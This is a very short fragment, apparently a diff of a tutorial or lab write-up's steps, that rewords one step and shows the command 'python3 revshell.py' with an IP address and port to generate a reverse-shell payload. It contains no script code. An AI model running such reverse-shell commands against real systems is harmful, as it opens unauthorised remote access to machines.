Skip to content

 print(cmdline)

-5. Run python script
+5. Run the script to generate the payload:

 python3 revshell.py 10.11.92.52 9002